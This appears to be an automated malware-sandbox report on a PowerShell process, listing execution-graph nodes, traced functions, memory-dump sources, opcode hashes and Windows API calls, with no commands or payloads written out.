                                                                                execution_graph 7584 7ffec8323b8e 7585 7ffec8323b97 7584->7585 7588 7ffec8322bd0 7585->7588 7587 7ffec8323c13 7589 7ffec8322bd5 7588->7589 7590 7ffec833c993 GetSystemInfo 7589->7590 7592 7ffec833c900 7589->7592 7591 7ffec833c9ce 7590->7591 7591->7587 7592->7587 7593 7ffec8327e98 7594 7ffec8327e9d GetFileAttributesW 7593->7594 7596 7ffec8327f36 7594->7596 7580 7ffec832894a 7581 7ffec833c210 ComputeAccessTokenFromCodeAuthzLevel 7580->7581 7583 7ffec833c2be 7581->7583

                                                                                Executed Functions

                                                                                Function 00007FFEC8322BBF Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2528539037.00007FFEC8320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8320000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 10285725d863a60091d10a7b0224442b4a472c278ffaffa49c4fcc5dfcb67ee6
                                                                                • Instruction ID: ef1b9c4960484e94afcb7c996b9f79ac9e433707a991b8669c2ebbdbdf056560
                                                                                • Opcode Fuzzy Hash: 10285725d863a60091d10a7b0224442b4a472c278ffaffa49c4fcc5dfcb67ee6
                                                                                • Instruction Fuzzy Hash: 6741277290CA4D8FE758DB6C88156E97BE0FFA6320F08427EE04CD3292DB246547C785
                                                                                Function 00007FFEC832894A Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2528539037.00007FFEC8320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8320000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                • String ID:
                                                                                • API String ID: 132034935-0
                                                                                • Opcode ID: 9d395035121c7c6bc089472c01f5d7ce9c2ae1c118681500959ef15729175f3f
                                                                                • Instruction ID: f6d8cc548729f0e29a956dc495d9c45a9550656606302ce964a61d08ff5a2972
                                                                                • Opcode Fuzzy Hash: 9d395035121c7c6bc089472c01f5d7ce9c2ae1c118681500959ef15729175f3f
                                                                                • Instruction Fuzzy Hash: 9131C431908A1C8FDB18DF9CD8456F97BE1FBA9711F04422EE04AD3252CB70A816CB85
                                                                                Function 00007FFEC8326EC2 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2528539037.00007FFEC8320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8320000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: d033f17036ce914fede4ff548b84bfe248c866031e712f9d36e83d4e4ccc62d2
                                                                                • Instruction ID: e8a903cc351e9ce4ff28014b073800f8facd7a32cdfb861de8fd655b5baa7636
                                                                                • Opcode Fuzzy Hash: d033f17036ce914fede4ff548b84bfe248c866031e712f9d36e83d4e4ccc62d2
                                                                                • Instruction Fuzzy Hash: E0216D71908A1C9FDB58DF98C849AFABBE1FB59311F14822ED00AD3652DB70A845CB91
                                                                                Function 00007FFEC8327E98 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2528539037.00007FFEC8320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8320000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 2f223333077c72292b03a41cac1d5991676a9e8241f450e5d1b19598da530724
                                                                                • Instruction ID: 4bc1c49443aebc33cf413aac8bcaa5be45509a1139fefb6b4766d3c5253073da
                                                                                • Opcode Fuzzy Hash: 2f223333077c72292b03a41cac1d5991676a9e8241f450e5d1b19598da530724
                                                                                • Instruction Fuzzy Hash: 16218E31908A1C9FDB58DF5C9849AE9BBE1FB55311F04822BD009D3652DB70A855CB81
                                                                                Function 00007FFEC8C74CEE Relevance: .3, Instructions: 264COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2627543105.00007FFEC8C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8c70000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 053865a754ef27303a4a82f663568a21f2d7d56ad8d9d32930704d29fd49c5fd
                                                                                • Instruction ID: b5c3580a9fd27261874dc42d9e7945ec740beb34508687254575cfcab84e2924
                                                                                • Opcode Fuzzy Hash: 053865a754ef27303a4a82f663568a21f2d7d56ad8d9d32930704d29fd49c5fd
                                                                                • Instruction Fuzzy Hash: 8061783290DA5A4EE7199E2CEC458F6BBD4EF52230F14017EE5C9C31A2E91DA983C357
                                                                                Function 00007FFEC8C78692 Relevance: .1, Instructions: 129COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 250 7ffec8c78692-7ffec8c786f3 254 7ffec8c786f5-7ffec8c786f9 250->254 255 7ffec8c786fe-7ffec8c7872e 250->255 256 7ffec8c7896f-7ffec8c7897b 254->256 260 7ffec8c78730-7ffec8c7874d 255->260 261 7ffec8c78759-7ffec8c78764 255->261 268 7ffec8c78754 260->268 264 7ffec8c78953-7ffec8c78961 261->264 265 7ffec8c7876a-7ffec8c7879d 261->265 265->264 268->256
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2627543105.00007FFEC8C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8c70000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 31e90177e84ac7d68c3bce42ef8108b8bc12f77d8e8853b4f61e41ff06255b75
                                                                                • Instruction ID: b79a568c40024688de64c1690cb42f295e53a7d715050a36762d666ea2c518ba
                                                                                • Opcode Fuzzy Hash: 31e90177e84ac7d68c3bce42ef8108b8bc12f77d8e8853b4f61e41ff06255b75
                                                                                • Instruction Fuzzy Hash: 3541C331A186098FEB98EF28D8596FD7BE1EF55360F10007EE54DC32E2EE296841C741
                                                                                Function 00007FFEC8A97FFB Relevance: .1, Instructions: 105COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 354 7ffec8a97ffb-7ffec8a9804e 355 7ffec8a980a0-7ffec8a980b5 354->355 356 7ffec8a98050-7ffec8a98068 354->356 361 7ffec8a980b7 355->361 362 7ffec8a980b9-7ffec8a980c9 355->362 357 7ffec8a9806a-7ffec8a9806b 356->357 358 7ffec8a9806e-7ffec8a9807e 356->358 357->358 364 7ffec8a98083-7ffec8a9809f 358->364 361->362 363 7ffec8a980f9-7ffec8a980fa 361->363
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2608299007.00007FFEC8A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8A90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8a90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3494b6dec6ce3eeb1d47abfe4d9da1f0d98522315b28bcaa3c4abe27b71795a4
                                                                                • Instruction ID: b2470403cd52493171f768f75dc9d11ae78f3d18b0b326e3b7dc232f1d2a473a
                                                                                • Opcode Fuzzy Hash: 3494b6dec6ce3eeb1d47abfe4d9da1f0d98522315b28bcaa3c4abe27b71795a4
                                                                                • Instruction Fuzzy Hash: C531B63060E7998FDB86EB28C8649657FB1EF9730471901EFE049CB1E3D91AAC45C792
                                                                                Function 00007FFEC8A9450B Relevance: .1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2608299007.00007FFEC8A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8A90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8a90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 81537a40c646df14f59b8300148dd0856b1172d00bec323c8bb4f0c4c8eb21d7
                                                                                • Instruction ID: 1920fc62dac26e8376eaf80ce2fb80e2bc6ea1a7339f5f633e75ea4fdc611f14
                                                                                • Opcode Fuzzy Hash: 81537a40c646df14f59b8300148dd0856b1172d00bec323c8bb4f0c4c8eb21d7
                                                                                • Instruction Fuzzy Hash: 2B31D230A0EA4A4FEB95DB58D45076277E1FF95314F5440BEE00DCB5A7CA2AED82C740
                                                                                Function 00007FFEC8621B13 Relevance: .1, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 17c934c55ef66d616e91070148337201487126c460ca871d29746b81a1a4a368
                                                                                • Instruction ID: 789345bd1ecc0c90e165698fa62718f093b0e37a1cb76ed746941712ff6644bf
                                                                                • Opcode Fuzzy Hash: 17c934c55ef66d616e91070148337201487126c460ca871d29746b81a1a4a368
                                                                                • Instruction Fuzzy Hash: CC21B06290EBC21FD7A75B2818641A07FE0EF5726135A02FBD4C8CB0E3ED0C6D468366
                                                                                Function 00007FFEC8620903 Relevance: .1, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f45b9cee68d91e6edfab886458aa4c8b865bcc11397096b154561610f6ef507
                                                                                • Instruction ID: c370555f7995bc240f28a04b2bbe35e380d3dc5309f0e72a87390a2bef1baf29
                                                                                • Opcode Fuzzy Hash: 1f45b9cee68d91e6edfab886458aa4c8b865bcc11397096b154561610f6ef507
                                                                                • Instruction Fuzzy Hash: 2B012D22F1DE6A5FE39BE71C14142B9A6E2FFD82217A801FBD48DC32A6DD15DD418341
                                                                                Function 00007FFEC8A945C1 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2608299007.00007FFEC8A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8A90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8a90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d59a1422d6c9ec4370f3c6b42b9f17af95c3e6d3ff2b5905cd1a8d29c3e68473
                                                                                • Instruction ID: 9d535de0502b8cac6902bae84d79f36e53776014dad1b22c6484f576307d4bb6
                                                                                • Opcode Fuzzy Hash: d59a1422d6c9ec4370f3c6b42b9f17af95c3e6d3ff2b5905cd1a8d29c3e68473
                                                                                • Instruction Fuzzy Hash: B8E02612B5CC0D0E98C4FE5C28015F9B3C1EB98210750067BE40EC22D7DC28B9854384
                                                                                Function 00007FFEC8624B84 Relevance: .0, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b1346604dd16f8d52a384534f149dea52eded0f5b7df2cccc0807d7ad2e82ead
                                                                                • Instruction ID: 5ecc41cd6d8fcf85e61cd66ea6afccef9d9b0ed26fb1469afef8aff950ce6137
                                                                                • Opcode Fuzzy Hash: b1346604dd16f8d52a384534f149dea52eded0f5b7df2cccc0807d7ad2e82ead
                                                                                • Instruction Fuzzy Hash: 4AE09251B1DBC66FE757B7384824239A9E1AF8620179800FEE0C8C62F3DD199E418301
                                                                                Function 00007FFEC86237A2 Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cdf02499ebbb75611dc73b35defec694cbbfb2684ffa25bc6571453357641d04
                                                                                • Instruction ID: 3ec63a67c40fc63074c312ee5ca92b2ee71c31d8ad3a4f7cd402b259bce73a23
                                                                                • Opcode Fuzzy Hash: cdf02499ebbb75611dc73b35defec694cbbfb2684ffa25bc6571453357641d04
                                                                                • Instruction Fuzzy Hash: 88E09A32A185198FDB88EB58E94A9E9B3E0FF08210B9000F6F10CD34B2CA25A811C704
                                                                                Function 00007FFEC862095A Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5affe399cf0e396a2c2c5eb4638103585393827eddfef40e93aab9f93f63e33
                                                                                • Instruction ID: b34c4c682757da4cd148d6df9fe613bb347fdc9853d634f8d6afb2e8f9f2cec6
                                                                                • Opcode Fuzzy Hash: b5affe399cf0e396a2c2c5eb4638103585393827eddfef40e93aab9f93f63e33
                                                                                • Instruction Fuzzy Hash: E5D01730A14E2E4EE38AAA28010827650C2EFD820276054B9A44EC72A9DD39E9828205
                                                                                Function 00007FFEC8624BBC Relevance: .0, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 90f0a7a6904c20a8d96896f5f77280e38616a53cb7f7024d6d940626ef03b1c9
                                                                                • Instruction ID: 7c70889cdc460424ec8e2a470622ded1ae4ce49f546aa10062c22461f8e358ae
                                                                                • Opcode Fuzzy Hash: 90f0a7a6904c20a8d96896f5f77280e38616a53cb7f7024d6d940626ef03b1c9
                                                                                • Instruction Fuzzy Hash: 70C01230B19A1A4ED799A734451467450D2AF8920175004FCA00DC22E2EC399802C704

                                                                                Non-executed Functions

                                                                                Function 00007FFEC86D2500 Relevance: .7, Instructions: 681COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3dcebe17a755646672dc7d0d7343ff2b31bd16ae6ddb749be7c62e0e5116e7da
                                                                                • Instruction ID: 93ac6ab8d5e549bae907c2aa346b2cf428663971547f848524b2fc8f73bddd56
                                                                                • Opcode Fuzzy Hash: 3dcebe17a755646672dc7d0d7343ff2b31bd16ae6ddb749be7c62e0e5116e7da
                                                                                • Instruction Fuzzy Hash: 85228234A18A498FD399EF3880553BAB6D2EF89305F5085BDA04EC72A3DE79D942C744
                                                                                Function 00007FFEC86D9E53 Relevance: .3, Instructions: 329COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5ffe0513879ada8de38cb10b4f61f20da3b02911c8d208f53a8f19fd19a42dd6
                                                                                • Instruction ID: 35e13f92a2046f844188650909f656a0857605bfba71904744d5b3ebdd429030
                                                                                • Opcode Fuzzy Hash: 5ffe0513879ada8de38cb10b4f61f20da3b02911c8d208f53a8f19fd19a42dd6
                                                                                • Instruction Fuzzy Hash: CCB19370A2C6854FE34AEF38445637AB7D1EF89305F5585BDA08AC72A3DE39D402C746
                                                                                Function 00007FFEC86D2212 Relevance: .3, Instructions: 298COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fa37258450807b2e45cecc4254def65407dc0e6348bdbeb3248eecd02d07a682
                                                                                • Instruction ID: 812cb9829a162367515071cc767505a7a4717d715aed31aa4c77ace0db602ade
                                                                                • Opcode Fuzzy Hash: fa37258450807b2e45cecc4254def65407dc0e6348bdbeb3248eecd02d07a682
                                                                                • Instruction Fuzzy Hash: 9DA1C670A186884FE389EF38445537ABBD1EF8D215F5586BEA08EC72A3DE38D402C305
                                                                                Function 00007FFEC86D18D5 Relevance: .2, Instructions: 157COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ebf7f6ec4d34d4ab50dfcb989c166eebc9682938436613ff815d587fd54398e6
                                                                                • Instruction ID: df502e8da41e44590b1aa0fc74bef415a863f501c53097b0baf15f50dfc2a8a7
                                                                                • Opcode Fuzzy Hash: ebf7f6ec4d34d4ab50dfcb989c166eebc9682938436613ff815d587fd54398e6
                                                                                • Instruction Fuzzy Hash: 5F51A470A2DA854FD34AEF38445537ABBD1EF89209F5485BEE08EC72A3DE39D4028345
                                                                                Function 00007FFEC8C7704A Relevance: .2, Instructions: 154COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2627543105.00007FFEC8C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8c70000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0900aae68c6b314c4a7bd6dbf811126306d25bb7cc0e5de7b6f897123bb8c112
                                                                                • Instruction ID: 89c0b5dbc68f7ae4d1bb5b907d76e2733ae03882894e5b572a4dda16b1c0a7a7
                                                                                • Opcode Fuzzy Hash: 0900aae68c6b314c4a7bd6dbf811126306d25bb7cc0e5de7b6f897123bb8c112
                                                                                • Instruction Fuzzy Hash: E351F05048F7C22EC79397B499685923FFA9D87130B0E81EBD5C8CE4A7D58E084AC363

                                                                                Execution Graph

                                                                                Execution Coverage:6.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:14.5%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:78
                                                                                execution_graph 62746 110179e0 GetTickCount 62753 110178f0 62746->62753 62754 11017910 62753->62754 62755 110179c6 62753->62755 62757 11017932 CoInitialize _GetRawWMIStringW 62754->62757 62760 11017929 WaitForSingleObject 62754->62760 62785 11162bb7 62755->62785 62758 110179b2 62757->62758 62762 11017965 62757->62762 62758->62755 62761 110179c0 CoUninitialize 62758->62761 62759 110179d5 62766 11017810 62759->62766 62760->62757 62761->62755 62762->62758 62763 110179ac 62762->62763 62793 111648ed 62762->62793 62798 111646f7 66 API calls __fassign 62763->62798 62767 11017830 62766->62767 62768 110178d6 62766->62768 62770 11017848 CoInitialize _GetRawWMIStringW 62767->62770 62773 1101783f WaitForSingleObject 62767->62773 62769 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62768->62769 62772 110178e5 SetEvent GetTickCount 62769->62772 62771 110178c2 62770->62771 62775 1101787b 62770->62775 62771->62768 62774 110178d0 CoUninitialize 62771->62774 62779 11147060 62772->62779 62773->62770 62774->62768 62775->62771 62776 110178bc 62775->62776 62778 111648ed std::locale::_Init 77 API calls 62775->62778 62801 111646f7 66 API calls __fassign 62776->62801 62778->62775 62780 11147071 62779->62780 62781 1114706c 62779->62781 62803 111464c0 62780->62803 62802 11146270 18 API calls std::locale::_Init 62781->62802 62786 11162bc1 IsDebuggerPresent 62785->62786 62787 11162bbf 62785->62787 62799 111784f7 62786->62799 62787->62759 62790 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 62791 1116cb76 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 62790->62791 62792 1116cb7e GetCurrentProcess TerminateProcess 62790->62792 62791->62792 62792->62759 62794 1116490d 62793->62794 62795 111648fb 62793->62795 62800 1116489c 77 API calls 2 library calls 62794->62800 62795->62762 62797 11164917 62797->62762 62798->62758 62799->62790 62800->62797 62801->62771 62802->62780 62806 11146370 62803->62806 62805 11017a27 62807 11146394 62806->62807 62808 11146399 62806->62808 62826 11146270 18 API calls std::locale::_Init 62807->62826 62810 11146402 62808->62810 62811 111463a2 62808->62811 62812 111464ae 62810->62812 62813 1114640f wsprintfA 62810->62813 62816 111463d9 62811->62816 62819 111463b0 62811->62819 62814 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62812->62814 62815 11146432 62813->62815 62817 111464ba 62814->62817 62815->62815 62818 11146439 wvsprintfA 62815->62818 62820 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62816->62820 62817->62805 62825 11146454 62818->62825 62822 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62819->62822 62821 111463fe 62820->62821 62821->62805 62823 111463d5 62822->62823 62823->62805 62824 111464a1 OutputDebugStringA 62824->62812 62825->62824 62825->62825 62826->62808 62827 110262c0 LoadLibraryA 62828 11031780 62829 1103178e 62828->62829 62833 11146a90 62829->62833 62832 110317af std::locale::_Init 62836 11145be0 62833->62836 62837 11145bf0 62836->62837 62837->62837 62842 11110230 62837->62842 62839 11145c02 62849 11145b10 62839->62849 62841 1103179f SetUnhandledExceptionFilter 62841->62832 62861 11163a11 62842->62861 62845 11110247 62878 11029a70 274 API calls 2 library calls 62845->62878 62846 1111025e _memset 62846->62839 62850 11145b27 _strncpy 62849->62850 62851 11145b62 __crtLCMapStringA_stat 62849->62851 62852 11145b45 62850->62852 62887 11143300 MultiByteToWideChar 62851->62887 62853 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62852->62853 62854 11145b5e 62853->62854 62854->62841 62856 11145b94 62888 11143340 WideCharToMultiByte GetLastError 62856->62888 62858 11145ba6 62859 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62858->62859 62860 11145bb9 62859->62860 62860->62841 62862 11163a8e 62861->62862 62866 11163a1f 62861->62866 62885 1116e368 DecodePointer 62862->62885 62864 11163a94 62886 1116a1af 65 API calls __getptd_noexit 62864->62886 62865 11163a2a 62865->62866 62879 1116e85d 65 API calls __NMSG_WRITE 62865->62879 62880 1116e6ae 65 API calls 5 library calls 62865->62880 62881 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 62865->62881 62866->62865 62869 11163a4d RtlAllocateHeap 62866->62869 62872 11163a7a 62866->62872 62876 11163a78 62866->62876 62882 1116e368 DecodePointer 62866->62882 62869->62866 62870 1111023e 62869->62870 62870->62845 62870->62846 62883 1116a1af 65 API calls __getptd_noexit 62872->62883 62884 1116a1af 65 API calls __getptd_noexit 62876->62884 62879->62865 62880->62865 62882->62866 62883->62876 62884->62870 62885->62864 62886->62870 62887->62856 62888->62858 62889 11041180 62890 110411b2 62889->62890 62891 110411b8 62890->62891 62894 110411d4 62890->62894 62893 110fb470 15 API calls 62891->62893 62892 110412e8 62895 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62892->62895 62896 110411ca CloseHandle 62893->62896 62894->62892 62898 1104120d 62894->62898 62921 110881d0 309 API calls 5 library calls 62894->62921 62897 110412f5 62895->62897 62896->62894 62898->62892 62899 11041268 62898->62899 62911 110fb470 GetTokenInformation 62899->62911 62902 1104127a 62903 11041282 CloseHandle 62902->62903 62906 11041289 62902->62906 62903->62906 62904 110412cb 62907 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62904->62907 62905 110412b1 62908 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62905->62908 62906->62904 62906->62905 62909 110412e4 62907->62909 62910 110412c7 62908->62910 62912 110fb4b8 62911->62912 62913 110fb4a7 62911->62913 62922 110f2300 9 API calls 62912->62922 62914 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62913->62914 62916 110fb4b4 62914->62916 62916->62902 62917 110fb4dc 62917->62913 62918 110fb4e4 62917->62918 62918->62918 62919 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62918->62919 62920 110fb50a 62919->62920 62920->62902 62921->62898 62922->62917 62923 11144dd0 62924 11144de1 62923->62924 62938 111447f0 62924->62938 62928 11144e65 62931 11144e82 62928->62931 62933 11144e74 62928->62933 62929 11144e2b 62930 11144e32 ResetEvent 62929->62930 62946 111449b0 274 API calls 2 library calls 62930->62946 62947 111449b0 274 API calls 2 library calls 62933->62947 62934 11144e46 SetEvent WaitForMultipleObjects 62934->62930 62936 11144e64 62934->62936 62936->62928 62937 11144e7f 62937->62931 62939 111447fc GetCurrentProcess 62938->62939 62940 1114481f 62938->62940 62939->62940 62941 1114480d GetModuleFileNameA 62939->62941 62945 11144849 WaitForMultipleObjects 62940->62945 62948 111101b0 62940->62948 62941->62940 62945->62928 62945->62929 62946->62934 62947->62937 62949 11163a11 _malloc 65 API calls 62948->62949 62950 111101ce 62949->62950 62951 11110203 _memset 62950->62951 62952 111101d7 wsprintfA 62950->62952 62955 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62951->62955 62971 11029a70 274 API calls 2 library calls 62952->62971 62956 1111021d 62955->62956 62956->62945 62957 11144140 GetModuleFileNameA 62956->62957 62958 111441c3 62957->62958 62959 11144183 62957->62959 62962 111441cf LoadLibraryA 62958->62962 62963 111441e9 GetModuleHandleA GetProcAddress 62958->62963 62972 11081e00 62959->62972 62961 11144191 62961->62958 62964 11144198 